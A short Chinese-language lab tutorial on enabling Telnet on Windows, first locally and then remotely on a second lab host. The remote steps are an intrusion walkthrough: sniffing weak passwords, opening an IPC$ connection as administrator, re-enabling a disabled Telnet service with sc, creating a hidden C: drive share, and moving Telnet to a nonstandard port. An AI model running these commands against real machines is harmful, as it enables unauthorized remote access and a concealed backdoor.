1 本地开启Telnet服务
进入主机A,右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,将启动类型改为“手动”
2 远程开启Telnet服务
(1)首先用流光嗅探等工具探得到对方密码,主要是弱口令(此步可跳过,用已知的实验机用户名密码进行试验)。
(2)在主机B的“控制面板-工具-文件夹选项-查看-简单的文件共享”去掉选取。
(3)右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,关闭之
(4)回到主机A用net use命令建立ipc$连接
cmd中输入:net use \10.1.1.119\ipc$ "主机B的密码" /uuser:administrator
(5)用sc命令把禁用的telnet服务变成自动
cmd中输入:sc \10.1.1.119 config tlntsvr start= auto
(6)切换到主机B,可以查看telnet的启动类型已经变为自动,,但还没有启动
(7)回到主机A,用sc命令将telnet启动
cmd中输入:sc \10.1.1.119 start tlntsvr
切换到主机B上就可以看到telnet服务已经启动
(8)新建一个cmd环境进行telnet登录:telnet 10.1.1.119
telnet连接建立之后,可输入用户名密码等相关信息进行登录,telnet服务登录到远程主机:
(9)登录后便可进行共享等相关操作,net share建立c$共享
cmd中输入:net share abc$=c:
查看共享目录:net share
(10)远程更改telnet端口
输入tlntadmn \10.1.1.119 config port=1000 -u administrator -p 主机B的密码
再次进行telnet连接,则会使用端口1000。